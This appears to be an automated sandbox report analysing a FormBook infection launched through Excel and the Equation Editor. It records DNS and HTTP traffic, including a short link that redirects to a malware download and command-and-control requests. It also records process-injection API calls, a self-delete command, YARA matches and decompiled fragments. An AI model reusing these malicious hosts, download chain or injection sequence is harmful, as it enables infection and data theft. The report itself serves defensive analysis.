Feb 23, 2021 17:47:42.278045893 CET | 8.8.8.8 | 192.168.2.22 | 0xc2de | No error (0) | thdyworkfinerainbotm.dns.army | | 103.141.138.118 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:47:42.344486952 CET | 8.8.8.8 | 192.168.2.22 | 0xc2de | No error (0) | thdyworkfinerainbotm.dns.army | | 103.141.138.118 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:48:45.931737900 CET | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.jtelitetraining.com | jtelitetraining.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 17:48:45.931737900 CET | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | jtelitetraining.com | | 160.153.136.3 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:49:02.263454914 CET | 8.8.8.8 | 192.168.2.22 | 0x2e78 | No error (0) | www.tiwapay.com | tiwapay.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 17:49:02.263454914 CET | 8.8.8.8 | 192.168.2.22 | 0x2e78 | No error (0) | tiwapay.com | | 81.169.145.165 | A (IP address) | IN (0x0001)

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • ow.ly
                                                                                                                                                          • thdyworkfinerainbotm.dns.army
                                                                                                                                                          • www.jtelitetraining.com
                                                                                                                                                          • www.tiwapay.com

                                                                                                                                                          HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 54.67.120.65 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 17:47:41.970222950 CET | 0 | OUT | GET /6gT330rxT5U HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                          Host: ow.ly
                                                                                                                                                          Connection: Keep-Alive
Feb 23, 2021 17:47:42.185451031 CET | 1 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                          Location: http://thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite
                                                                                                                                                          Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-Permitted-Cross-Domain-Policies: master-only
                                                                                                                                                          Date: Tue, 23 Feb 2021 16:47:42 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          X-Pool: owly_web


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 103.141.138.118 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 17:47:42.569209099 CET | 2 | OUT | GET /findoc/svchost.exe?platform=hootsuite HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Host: thdyworkfinerainbotm.dns.army
Feb 23, 2021 17:47:42.792349100 CET | 3 | IN | HTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 23 Feb 2021 16:47:41 GMT
                                                                                                                                                          Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0
                                                                                                                                                          Last-Modified: Tue, 23 Feb 2021 13:00:36 GMT
                                                                                                                                                          ETag: "6fe00-5bc0081234afa"
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 458240
                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 160.153.136.3 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 17:48:45.993432999 CET | 486 | OUT | GET /ffw/?Op=Z6Ad&TD=pm4+eduCQwER/qZxnrPJuw4xUSDN7aZmpWq/zCgzL/Y307WdsenSSF4f4mH0J/evCd5k6w== HTTP/1.1
                                                                                                                                                          Host: www.jtelitetraining.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
Feb 23, 2021 17:48:46.042944908 CET | 486 | IN | HTTP/1.1 302 Found
                                                                                                                                                          Connection: close
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          cache-control: no-cache
                                                                                                                                                          Location: /ffw/?Op=Z6Ad&TD=pm4+eduCQwER/qZxnrPJuw4xUSDN7aZmpWq/zCgzL/Y307WdsenSSF4f4mH0J/evCd5k6w==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49168 | 81.169.145.165 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 17:49:02.308176041 CET | 487 | OUT | GET /ffw/?TD=4mSI10Yn2rl+AeK9/MktY46XOThf9FEOxx944hcMIRU/zkocuFA5YRhQIs2qWJDYV02QxA==&Op=Z6Ad HTTP/1.1
                                                                                                                                                          Host: www.tiwapay.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
Feb 23, 2021 17:49:02.355357885 CET | 487 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Date: Tue, 23 Feb 2021 16:49:02 GMT
                                                                                                                                                          Server: Apache/2.4.46 (Unix)
                                                                                                                                                          Content-Length: 196
                                                                                                                                                          Connection: close
                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                          Code Manipulations

                                                                                                                                                          User Modules

                                                                                                                                                          Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                                                                                                                                          Processes

                                                                                                                                                          Process: explorer.exe, Module: USER32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE8
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE8
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE8
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE8

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Start time:17:46:52
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                          Imagebase:0x13fd90000
                                                                                                                                                          File size:27641504 bytes
                                                                                                                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:47:13
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:543304 bytes
                                                                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:47:17
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0xcf0000
                                                                                                                                                          File size:458240 bytes
                                                                                                                                                          MD5 hash:CACC98CE31DE0F63F04834BF952AC3DC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 15%, ReversingLabs
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:17:47:20
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                          Imagebase:0xcf0000
                                                                                                                                                          File size:458240 bytes
                                                                                                                                                          MD5 hash:CACC98CE31DE0F63F04834BF952AC3DC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:17:47:21
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                          Imagebase:0xcf0000
                                                                                                                                                          File size:458240 bytes
                                                                                                                                                          MD5 hash:CACC98CE31DE0F63F04834BF952AC3DC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:
                                                                                                                                                          Imagebase:0xffca0000
                                                                                                                                                          File size:3229696 bytes
                                                                                                                                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:47:37
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                          Imagebase:0xda0000
                                                                                                                                                          File size:27136 bytes
                                                                                                                                                          MD5 hash:32297BB17E6EC700D0FC869F9ACAF561
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          General

                                                                                                                                                          Start time:17:47:42
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0x4a8a0000
                                                                                                                                                          File size:302592 bytes
                                                                                                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Disassembly

                                                                                                                                                          Code Analysis

                                                                                                                                                            Executed Functions

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180890908.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: &$-$.$=$?$F$N$U$\$_$h$m$t
                                                                                                                                                            • API String ID: 0-2137078230
                                                                                                                                                            • Opcode ID: 839e50b4ac0fdc3ac0cb08132571bfbfae562d784f47d5fb94d1a5b9d4de37ec
                                                                                                                                                            • Instruction ID: 7eff69cb8ebe463e5e924462eea519826c84e6ed45338abc29409fd6c930077a
                                                                                                                                                            • Opcode Fuzzy Hash: 839e50b4ac0fdc3ac0cb08132571bfbfae562d784f47d5fb94d1a5b9d4de37ec
                                                                                                                                                            • Instruction Fuzzy Hash: 6582F671C05368CEDB29CFA2C9583EDFAB8BB45349F149099C24977692C7784AC8DF18
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180890908.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: #$'$+$:$=$@$J$l$p$w
                                                                                                                                                            • API String ID: 0-44647363
                                                                                                                                                            • Opcode ID: 0b5fc37b1109fc0f83bc11deb6b1507f675bb8aaf3fb70f43fc9bb79202ec873
                                                                                                                                                            • Instruction ID: 0c34ac28122e358e350f6bc28043bf51ca18e2897bb5431935a2b920f36471cb
                                                                                                                                                            • Opcode Fuzzy Hash: 0b5fc37b1109fc0f83bc11deb6b1507f675bb8aaf3fb70f43fc9bb79202ec873
                                                                                                                                                            • Instruction Fuzzy Hash: 72820671C05268CEDB29CFA2C9593EDFAB8BB45349F1490D9C209B7692C7784AC8DF14
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,GOj$JOj
                                                                                                                                                            • API String ID: 0-3716394560
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: JOj
                                                                                                                                                            • API String ID: 0-2362757868
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180890908.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180890908.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 008907CF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 008907CF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 008900F2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00890243
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00890243
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00890382
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00890382
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 008900F2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 003BFE6F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180890908.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • ResumeThread.KERNELBASE(?), ref: 003BFD1E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180890908.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ResumeThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,GOj$JOj
                                                                                                                                                            • API String ID: 0-3716394560
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180890908.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: @2*m
                                                                                                                                                            • API String ID: 0-3252119314
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Executed Functions

                                                                                                                                                            APIs
                                                                                                                                                            • NtQueryInformationProcess.NTDLL ref: 003D99BF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216874701.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InformationProcessQuery
                                                                                                                                                            • String ID: 0
                                                                                                                                                            • API String ID: 1778838933-4108050209
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                            			E00419DB2(void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44) {
                                                                                                                                                            				char _v1;
                                                                                                                                                            				char* _t59;
                                                                                                                                                            
                                                                                                                                                            				asm("rcl dword [ebx+0x5f], 0xe3");
                                                                                                                                                            				_t59 =  &_v1;
                                                                                                                                                            				if (_t59 == 0) goto L3;
                                                                                                                                                            				_push(_t59);
                                                                                                                                                            			}






                                                                                                                                                            APIs
                                                                                                                                                            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID: BMA$BMA$HA
                                                                                                                                                            • API String ID: 2738559852-181183267
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 25%
                                                                                                                                                            			E00419E0A(void* __edx, void* __edi, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                            				intOrPtr _v0;
                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                            				void* _t19;
                                                                                                                                                            				void* _t31;
                                                                                                                                                            				intOrPtr* _t32;
                                                                                                                                                            				void* _t34;
                                                                                                                                                            
                                                                                                                                                            				asm("xlatb");
                                                                                                                                                            				 *((char*)(__edi + 0x1a)) = 0x55;
                                                                                                                                                            				_t14 = _v0;
                                                                                                                                                            				_t4 = _t14 + 0xc48; // 0x656dec15
